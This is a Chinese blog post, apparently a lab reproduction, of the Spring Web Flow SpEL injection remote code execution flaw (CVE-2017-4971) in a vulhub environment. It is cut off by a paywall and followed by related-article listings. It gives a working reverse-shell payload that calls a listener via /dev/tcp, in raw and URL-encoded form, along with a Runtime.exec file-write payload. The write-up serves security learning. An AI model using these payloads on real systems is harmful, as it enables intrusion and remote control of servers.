网络安全:Spring框架漏洞总结(二)

最新推荐文章于 2024-05-08 21:24:58 发布
最新推荐文章于 2024-05-08 21:24:58 发布
阅读量271 收藏
点赞数
文章标签: spring web安全 java 网络安全 架构
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75857562/article/details/128677177
版权
安全防护

1.使用1.0.x版本的用户应放弃在认证通过和错误这两个页面中使用Whitelabel这个视图。 2.使用2.0.x版本的用户升级到2.0.10以及更高的版本

因为对java不是很熟,所以没有对底层原理进行分析

2.Spring Web Flow框架远程代码执行(CVE-2017-4971)

漏洞简介

Spring Web Flow是Spring的一个子项目,主要目的是解决跨越多个请求的、用户与服务器之间的、有状态交互问题,提供了描述业务流程的抽象能力。

Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成任意命令执行。

影响版本
Spring WebFlow 2.4.0 - 2.4.4
触发条件

  1. MvcViewFactoryCreator对象的useSpringBeanBinding参数需要设置为false(默认值)

  2. flow view对象中设置BinderConfiguration对象为空

漏洞复现

开启漏洞

image.png

在这里插入图片描述

点击login

image.png

可以看见这里有很多默认的用户名密码,随便选一组登录系统
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-mJ0ca8eV-1673601433750)(null)]

然后访问id为1的酒店地址:

http://192.168.173.144:8080/hotels/1

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bsKUWxgn-1673601433106)(null)]

点击预订按钮”Book Hotel",填写相关信息后点击“ Process”(从这一步,其实WebFlow就正式开始了)︰

image.png

随便输入一些内容后,我们点击Proceed然后会跳转到Confirm页面(Credit Card为16位):

image.png

点击confirm时进行抓包

image.png

image.png

反弹shell的poc:

原POC:
&_(new java.lang.ProcessBuilder("bash","-c","bash -i >& /dev/tcp/192.168.173.133/1234 0>&1")).start()=vulhub

URL编码后
&_(new java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/192.168.173.133/1234 0>%261")).start()=vulhub

image.png

exp扩展

1、向里面写入文件

&_T(java.lang.Runtime).getRuntime().exec("touch /tmp/zcc")

最低0.47元/天 解锁文章
网安护手
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
检测到目标url存在框架注入漏洞_Django JSONField SQL注入漏洞复现(CVE-2019-14234)
weixin_40000131的博客
11-22 935
0x00 简介Django是一款广为流行的开源web框架,由Python编写,许多网站和app都基于Django开发。Django采用了MTV的框架模式,即模型M,视图V和模版T,使用Django,程序员可以方便、快捷地创建高品质、易维护、数据库驱动的应用程序。而且Django还包含许多功能强大的第三方插件,使得Django具有较强的可扩展性。0x01 漏洞概述该漏洞需要开发者使用了JSONFie...
Spring RCE 漏洞
归零安全(transnul)
03-30 444
​本文由Scynull编译,校对,转载请注明。 免责申明 归零安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。 本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!! JDK版本号排查 1.JDK版本排查 在业务系统的运行服务器上,执行“java -version”命令
Python 开发 框架安全:Django SQL注入漏洞测试.(CVE-2021-35042)
最新发布
网络安全领域___专研者.
05-08 823
Django 是一个用 Python 编写的 Web 应用程序框架。它提供了许多工具和库,使得开发 Web 应用程序变得更加容易和高效。Django 遵循了“MTV”(模型-模板-视图)的设计模式,将应用程序的不同组件分离开来,使得开发人员可以更加专注于应用程序的不同方面。
安全风险通告】Spring Framework远程代码执行漏洞(CVE-2022-22965)安全风险通告第次更新...
smellycat000的专栏
04-01 1230
奇安信CERT致力于第一时间为企业级用户提供安全风险通告和有效解决方案。安全通告近日,奇安信CERT监测到Spring Framework存在远程代码执行漏洞(CVE-2022-22965),在 JDK 9 及以上版本环境下,远程攻击者可利用该漏洞写入恶意代码导致远程代码执行漏洞。此漏洞POC、技术细节及EXP已公开,经过奇安信CERT研判,此漏洞POC有效。鉴于此漏洞影...
框架注入漏洞
conkeyn的专栏
02-27 5530
  2 详细描述 攻击者有可能注入含有恶意内容的 frame 或 iframe 标记。如果用户不够谨慎,就有可能浏览该标记,却意识不到自己会离开原始站点而进入恶意的站点。之后,攻击者便可以诱导用户再次登录,然后获取其登录凭证。 解决办法 建议过滤出所有以下字符: [1] |(竖线符号) [2] & (& 符号) [3];(分号) [4] $(美元符号...
Spring Framework远程代码执行漏洞(CVE-2022-22965)
qq_50854662的博客
06-27 912
Spring Framework远程代码执行漏洞(CVE-2022-22965)
93道网络安全面试题目
07-20
“93道网络安全面试题目” 从给定的文件信息中,我们可以总结出以下知识点: 1. SQL 注入攻击 * 定义:攻击者在 HTTP 请求中注入恶意的 SQL 代码,使服务器使用参数构建数据库 SQL 命令时,恶意 SQL 被一起构造,...
93道网络安全面试题PDF资料
10-14
网络安全面试题涵盖了多个关键领域的知识,包括SQL注入攻击、XSS攻击、CSRF攻击、文件上传漏洞和DDoS攻击,以及ARP协议的工作原理。下面将详细解释这些知识点: 1. **SQL注入攻击**:这是一种利用用户输入数据构造...
网络安全面试题及答案word资料
10-14
网络安全是信息技术领域中至关重要的一个方面,特别是在面试中,了解并掌握网络安全的基础知识和常见攻击防范策略是必不可少的。以下是对这些知识点的详细说明: 1. **ARP协议**:Address Resolution Protocol,...
Java安全知识点详解:加密、认证、防护和漏洞扫描
06-19
授权框架Spring Security和Apache Shiro管理用户权限,决定用户能做什么。单点登录(SSO)让用户只需一次登录即可访问多系统,通常通过Cookie或Token实现。 安全通信和防护涉及数据传输的安全。HTTPS通过SSL/TLS...
WEB框架0day漏洞的发掘及分析经验分享.pdf
09-11
在当今的互联网环境中,Web框架扮演着至关重要的角色,它们为开发者提供了便捷的开发环境,但同时也成为网络安全的一大关注点。0day漏洞,即未公开且未修复的漏洞,对Web框架安全构成了严重威胁。本文将分享关于...
JAVA项目实践,URL存在跨站漏洞,注入漏洞解决方案.docx
10-26
JAVA项目实践,URL存在跨站漏洞,注入漏洞解决方案.docx
Spring Framework远程代码执行漏洞_CVE-2022-22965复现
ANYOUZHEN的博客
06-04 881
漏洞描述及背景:准备复现在kali上使用vulhub打开环境: docker-compose up -d查看vulhub的信息,可以看到端口为8080,输入网址http://127.0.0.1:8080/ 按照作者的链接:http://127.0.0.1:8080/?name=Bob&age=25 然后根据提示,构造请求地址: 对该地址进行抓包,抓包前记得修改bp默认端口,因为默认端口8080和本次ip地址冲突了,改完后记得把火狐插件上面的也进行更改,反正不是8080就行。(这里建议弄两个,一个8080
最新漏洞Spring Framework远程代码执行漏洞
「 虚幻私塾」
04-01 471
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 Spring Framework远程代码执行漏洞 发布时间 2022-03-31 漏洞等级 High CVE编号 CVE-2022-22965 影响范围:同时满足以下三个条件可确定受此漏洞影响: JDK 版本 >= 9 使用了 Spring 框架或衍生框架 项目中
SpringBoot框架SpEL表达式注入漏洞复现与原理分析
二狗的博客
02-13 909
这是2016年的一个洞,利用条件是至少知道一个触发 springboot 默认错误页面的接口及参数名。影响版本:1.1.0-1.1.12 1.2.0-1.2.7 1.3.0修复方案:升级版本对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
java 框架注入漏洞修复_Mybatis框架下易产生SQL注入漏洞的场景和修复方法
weixin_32206303的博客
02-28 1238
一、Mybatis框架下易产生SQL注入漏洞的场景在基于Mybatis框架Java白盒代码审计工作中,通常将着手点定位在Mybatis的配置文件中。通过查看这些与数据库交互的配置文件来确定SQL语句中是否存在拼接情况,进而确立跟踪点。通过总结,Mybatis框架下易产生SQL注入漏洞的情况有以下三种:1. 模糊查询 like以新闻详情页面为例,按照新闻标题对新闻进行模糊查询,如果考虑安全编码规范...
网络安全Spring框架漏洞总结
kali_Ma的博客
09-11 1025
安全防护 1.使用1.0.x版本的用户应放弃在认证通过和错误这两个页面中使用Whitelabel这个视图。 2.使用2.0.x版本的用户升级到2.0.10以及更高的版本 因为对java不是很熟,所以没有对底层原理进行分析 2.Spring Web Flow框架远程代码执行(CVE-2017-4971) 漏洞简介 Spring Web Flow是Spring的一个子项目,主要目的是解决跨越多个请求的、用户与服务器之间的、有状态交互问题,提供了描述业务流程的抽象能力。 Spring WebFlow 是一个适用于
链接或框架注入漏洞原理以及修复方法
it知识分享 free for nothing..
02-02 1184
链接或框架注入漏洞原理以及修复方法
常见框架漏洞
Hacker0830的博客
04-13 2334
原理:当用户勾选RememberMe并登录成功,Shiro会将用户的cookie值序列化,AES加密,接着base64编码后存储在cookie的rememberMe字段中,服务端收到登录请求后,会对rememberMe的cookie值进行base64解码,接着进行AES解密,然后反序列化。S2-059:攻击者可以通过构造恶意的OGNL表达式,并将其设置到可被外部输入进行修改,且会执行OGNL表达式的Struts2标签的属性值,引发OGNL表达式解析,最终造成远程代码执行的影响。
2023年关键漏洞攻防演练手册:企业必备高危漏洞清单
在2023年的攻防演练中,必备的高危漏洞集合由斗象科技漏洞情报中心提供,该集合针对企业和组织的网络安全进行重点关注,旨在帮助它们增强防护措施,确保系统安全。这个v1.0版本的集合包含了多个关键漏洞,涵盖了不同...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值